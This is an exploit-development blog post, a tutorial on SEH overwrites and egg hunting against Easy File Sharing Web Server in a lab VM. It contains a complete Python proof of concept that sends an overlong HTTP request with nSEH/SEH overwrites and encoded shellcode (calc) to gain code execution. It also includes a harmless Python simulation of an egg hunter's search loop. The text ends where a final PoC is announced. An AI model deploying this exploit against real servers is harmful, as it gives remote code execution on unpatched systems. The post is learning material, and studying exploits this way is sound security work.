
Let me just start off & say this is the coolest thing I’ve done thus far while learning exploit development! It’s in-fucking-sane & I love it. As usual, the “Binary Gods” are the only reason why a mere mortal like myself can absorb and comprehend the material that they’ve so graciously laid out on a silver platter. Man, every day I appreciate, respect & look up to the guys behind these resources. They’re the real MVPs. In case you didn’t know, I’m speaking about Corelan, FuzzySecurity, SecuritySift, Exploit-DB and the countless other resources I pillage daily in a quest to understand more. You should probably be reading something they produced, not this! LMAO – anyways, welcome. Let’s Rock.
Today’s a weeknight & we’re lazy, so we’ll be tackling a remote exploit but all from the same system lmao. In addition there is no reverse shell. I remember in the beginning that’s the only type of payload I’d go for, usually a Meterpreter, as if I was exploiting anyone besides myself. Nowadays showing execution hijacking & code execution suffices, so I use (what an old me would have called corny) a calculator. Ties back into the laziness: I never have to update an LHOST or PORT hehe. The application is Easy File Sharing Web Server running inside an XP SP3 VM inside of VMware Fusion. Here’s the app:

So it’s a web server; if you hit the IP you get a login page, which doesn’t really matter. If you haven’t read the SEH Technique post then you probably should, I’m not going to go into detail about it here. This exploit begins the same as that one, but it’s in a different piece of software.
So let’s level the playing field before the fun starts. I tried for about an hour w/ a direct EIP overwrite and JMP <REG>; that didn’t work. Not really sure why, anyway it was a good time to test the SEH-based way. I was able to overwrite the SEH handler, determine the offset, overwrite nSEH with a short jmp, and overwrite SEH with a pop pop ret, in turn gaining control of execution. All is good, but since this is a post on eggs you probably guessed that this is just the beginning. Correct! Anyways, here’s the PoC for the SEH part thus far:
#!/usr/bin/env python2
import socket
import os
from struct import pack
# Based on https://www.exploit-db.com/exploits/42186/
# Python 2: all of these are byte strings, so the raw "\x.." escapes go on the wire as-is
crash1 = "A" * 4061                         # padding up to the nSEH record
# nSEH - short jmp forward 6 bytes (over the SEH handler address), padded with nops
crash1 += "\x90\x90\xeb\x06"
# SEH handler: !mona seh -> pop pop ret at 0x10010334
crash1 += pack("<L", 0x10010334)
crash1 += "\x90" * 50                       # nop sled the short jmp lands in
# calc shellcode (alphanumeric-encoded)
crash1 += ("\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" +
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" +
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" +
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" +
"\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" +
"\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" +
"\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" +
"\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" +
"\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" +
"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" +
"\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" +
"\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" +
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" +
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" +
"\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" +
"\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" +
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" +
"\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" +
"\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" +
"\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" +
"\x31\x42\x4c\x42\x43\x45\x50\x41\x41")
print "[+] Length of crash1 " + str(len(crash1))
crash1 += "C" * (5000 - len(crash1))        # pad the request path out to 5000 bytes
payload = "GET " + crash1 + " HTTP/1.1\r\n"
payload += "Host: 172.16.192.163\r\n"
payload += "User-Agent: Mozilla/5.0(X11; Linux x86_64;rv:43.0) Gecko 2001001001 Firfox/43.0 Iceweasle/43.0\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.192.163", 80))
print "[+] Sending Payload ..."
s.send(payload)
s.close()
Sometimes when you overflow a buffer, the part of your input that lands at a deterministic place is small, a few hundred bytes, while the rest of your buffer (the larger part) also ends up in memory but at non-deterministic locations. Maybe you could pop a calc in that small space, but that’s not cool in real life. There are other alternatives; seeking those out is an exercise for the reader.
Egg hunting, which can be thought of as staged shellcode, uses that small deterministic buffer to hold a piece of shellcode that “hunts” through memory searching for the egg: a unique string repeated twice and prepended to your real shellcode (which ends up in the larger buffer that could be anywhere). Logic for this post roughly goes like:
- Overwrite nSEH & SEH and place the egg hunter shellcode where the short jmp lands; inject the larger buffer (egg + shellcode) as well
- The egg hunter incrementally searches through memory, abusing a system call to determine first:
  - Is this memory address valid?
    - nasty things can happen when you try and de-reference a bogus pointer (try lol)
  - Is this our egg?
    - If so, do a dance … JK, if so, begin execution (our shellcode is right behind it)
    - If not, loop back, increment the memory address and repeat the process from “Is this memory address valid?”
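To make the loop above concrete, here is a Python model of the hunt (an added example, not the author’s code or the real x86 hunter). It fakes a sparse address space where some pages are unmapped, stands in for the syscall-based access check with a page lookup, and walks memory exactly as the list describes: skip a whole page when the address is invalid, otherwise compare 8 bytes against the doubled tag and return the address right behind the egg. The tag `w00t`, the page layout and the fake shellcode bytes are all constructed for the example; the single lone copy of the tag on page 0x2000 shows why the egg is the tag twice (the hunter’s own copy of the tag must not match).

```python
"""Model of an egg hunter's search loop over a fake, sparsely mapped address space.

Constructed example: the memory layout, tag and 'shellcode' below are made up.
"""

PAGE_SIZE = 0x1000


def build_egg(tag):
    """The egg is the 4-byte tag repeated twice; the hunter itself only embeds one copy."""
    assert len(tag) == 4, "egg tag must be exactly 4 bytes"
    return tag * 2


class FakeMemory:
    """Sparse address space: only pages present in `pages` are readable."""

    def __init__(self, pages):
        # {page_base_address: bytes of length PAGE_SIZE}
        self.pages = pages

    def page_of(self, addr):
        return addr & ~(PAGE_SIZE - 1)

    def is_readable(self, addr):
        # Stand-in for the access check a real hunter does via a system call
        # (on Windows typically NtAccessCheckAndAuditAlarm or NtDisplayString):
        # does the page containing `addr` exist at all?
        return self.page_of(addr) in self.pages

    def read(self, addr, n):
        """Read n bytes; raises (like an access violation) if any byte is unmapped."""
        out = b""
        for a in range(addr, addr + n):
            page = self.page_of(a)
            if page not in self.pages:
                raise ValueError("access violation at 0x%08x" % a)
            off = a - page
            out += self.pages[page][off:off + 1]
        return out


def hunt(mem, egg, start=0, end=0x10000):
    """Search [start, end) for `egg`; return the address just after it, or None.

    Unmapped pages are skipped whole instead of faulting on every byte, which is
    why a real hunter finishes in seconds rather than minutes.
    """
    addr = start
    while addr < end:
        if not mem.is_readable(addr):
            addr = mem.page_of(addr) + PAGE_SIZE   # next page
            continue
        # Both halves of the 8-byte egg must be readable before comparing.
        if mem.is_readable(addr + len(egg) - 1) and mem.read(addr, len(egg)) == egg:
            return addr + len(egg)                  # shellcode sits right behind the egg
        addr += 1
    return None


def build_sample_memory(egg, shellcode):
    """Constructed layout: two filler pages, a gap of unmapped pages, then the big buffer."""
    tag = egg[:4]
    filler = bytearray(b"\x41" * PAGE_SIZE)
    filler[0x10:0x14] = tag                        # lone tag (like the hunter's own copy): must NOT match
    big = bytearray(b"\x43" * PAGE_SIZE)           # the large, non-deterministic buffer
    off = 0x200
    big[off:off + len(egg)] = egg
    big[off + len(egg):off + len(egg) + len(shellcode)] = shellcode
    # pages 0x3000 and 0x4000 are deliberately absent (unmapped)
    return FakeMemory({0x1000: bytes(filler), 0x2000: bytes(filler), 0x5000: bytes(big)})


def demo():
    egg = build_egg(b"w00t")
    shellcode = b"\xcc" * 16                       # constructed marker, not real shellcode
    mem = build_sample_memory(egg, shellcode)
    hit = hunt(mem, egg)
    found = hit is not None and mem.read(hit, len(shellcode)) == shellcode
    return hit, found


if __name__ == "__main__":
    address, ok = demo()
    print("egg found, shellcode at 0x%08x: %s" % (address, ok))
```

Running it lands on 0x5208 (page 0x5000 + offset 0x200 + the 8-byte egg), and the lone tag on the filler pages is passed over because only one copy is present.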
It surprised me how fast it is, ~4 seconds. Here’s the final PoC:
